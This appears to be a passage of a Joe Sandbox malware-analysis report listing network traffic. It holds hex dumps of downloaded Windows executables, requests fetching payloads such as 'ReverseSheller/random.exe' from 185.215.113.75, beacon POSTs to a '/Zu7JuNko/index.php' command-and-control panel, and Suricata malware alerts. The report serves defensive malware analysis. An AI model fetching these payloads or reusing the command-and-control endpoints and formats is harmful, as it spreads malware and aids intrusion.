00 00 40 2e 72 65 6c 6f 63 00 00 24 aa 0a 00 00 a0 70 00 00 ac 0a 00 00 56 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:34 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:41 GMTContent-Type: application/octet-streamContent-Length: 53760Last-Modified: Tue, 11 Feb 2025 05:29:23 GMTConnection: keep-aliveETag: "67aae033-d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 13 e0 aa 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c6 00 00 00 0a 00 00 00 00 00 00 16 e5 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 e4 00 00 4f 00 00 00 00 00 01 00 1c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 8c e3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 c5 00 00 00 20 00 00 00 c6 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 06 00 00 00 00 01 00 00 08 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 56 00 00 ec 8c 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 6d 00 00 00 01 00 00 11 00 28 03 00 00 06 00 28 03 00 00 06 00 28 03 00 00 06 00 28 03 00 00 06 00 14 fe 06 02 00 00 06 73 18 00 00 0a 73 19 00 00 0a 0a 28 03 00 00 06 00 06 6f 1a 00 00 0a 00 7e 0b 00 00 04 25 2d 17 26 7e 0a 00 00 04 fe 06 2e 00 00 06 73 18 00 00 0a 25 80 0b 00 00 04 73 19 00 00 0a 80 01 00 00 04 7e 01 00 00 04 6f 1a 00 00 0a 00 2a 00 00 00 1b 30 05 00 18 03 00 00 02 00 00 11 73 2f 00 00 06 0a 00 28 03 00 00 06 00 28 09 00 00 06 0b 06 73 39 00 00 06 7d 0c 00 00 04 06 fe 06 30 00 00 06 73 1b 00 00 0a 28 1c 00 00 0a 26 00 00 28 03 00 00 06 00 28 0b 00 00 06 0c 28 12 00 00 06 2d 07 72 01 00 00 70 2b 05 72 0b 00 00 70 0d 28 14 00 00 06 13 04 28 03 00 00 06 00 28 1d 00 00 0a 28 1e 00 00 0a 6f 1f 00 00 0a 28 20 00 00 0a 13 05 28 1d 00 00 0a 28 13 00 00 06 6f 1f 00 00 0a 28 20 00 00 0a 13 06 28 0c 00 00 06 13 07 28 0d 00 00 06 13 08 28 0e 00 00 06 13 09 1f 16 8d 4a 00 00 01 25 16 72 17 00 00 70 a2 25 17 07 28 28 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:45 GMTContent-Type: application/octet-streamContent-Length: 1428992Last-Modified: Mon, 10 Feb 2025 23:07:48 GMTConnection: keep-aliveETag: "67aa86c4-15ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e d1 90 32 1a b0 fe 61 1a b0 fe 61 1a b0 fe 61 0e db fd 60 17 b0 fe 61 0e db fb 60 b5 b0 fe 61 0e db fa 60 0c b0 fe 61 48 c5 fb 60 55 b0 fe 61 48 c5 fa 60 08 b0 fe 61 48 c5 fd 60 03 b0 fe 61 0e db ff 60 15 b0 fe 61 1a b0 ff 61 df b0 fe 61 d2 c5 f6 60 18 b0 fe 61 d2 c5 01 61 1b b0 fe 61 d2 c5 fc 60 1b b0 fe 61 52 69 63 68 1a b0 fe 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 34 37 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 dc 06 00 00 b2 01 00 00 00 00 00 d3 5c 00 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 3f 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 30 00 40 02 00 00 00 d0 08 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 00 10 00 00 00 d2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 60 01 00 00 f0 06 00 00 a6 00 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 00 00 00 50 08 00 00 04 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 80 08 00 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 00 00 00 90 08 00 00 2c 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 d0 08 00 00 02 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 27 00 00 e0 08 00 00 ba 02 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 70 0e 00 00 d0 30 00 00 66 0e 00 00 68 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:52 GMTContent-Type: application/octet-streamContent-Length: 1813504Last-Modified: Mon, 10 Feb 2025 16:18:45 GMTConnection: keep-aliveETag: "67aa26e5-1bac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 a0 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 47 00 00 04 00 00 ac 71 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 73 75 70 6e 70 6d 00 c0 1a 00 00 c0 2c 00 00 ba 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 78 75 69 62 76 77 00 20 00 00 00 80 47 00 00 04 00 00 00 86 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 47 00 00 22 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 45 39 31 43 46 45 35 44 44 30 43 34 36 41 44 43 45 34 43 36 39 33 41 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 45 33 37 44 41 39 33 41 41 38 37 32 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325E91CFE5DD0C46ADCE4C693A053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FE37DA93AA872FE481D3DA8732070E7A105D117CE95E9
                                Source: global trafficHTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 39 39 36 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1074996001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/LostRobotic/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 39 39 37 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1074997001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 39 39 38 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1074998001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 39 39 39 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1074999001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 30 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075000001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 31 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075001001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 32 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075002001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 33 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075003001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 34 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075004001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Sun, 09 Feb 2025 11:32:34 GMTIf-None-Match: "67a89252-1fa800"
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 37 35 30 30 35 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: e0=1075005001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/5957639473/8OH46ok.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 36 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075006001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 37 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075007001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 38 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075008001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/7133380843/X7kkUXr.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 30 39 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075009001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/563390996/0l1LuE1.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 30 31 30 30 30 31 26 75 6e 69 74 3d 34 32 35 33 31 36 35 36 37 32 39 36 Data Ascii: d1=1075010001&unit=425316567296
                                Source: global trafficHTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
                                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                                Source: Joe Sandbox ViewIP Address: 185.215.113.75 185.215.113.75
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: unknownDNS query: name: ipinfo.io
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49758 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49762 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49764 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49768 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49767 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49765 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49771 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49772 -> 185.215.113.75:80
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49763 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49769 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49774 -> 185.215.113.75:80
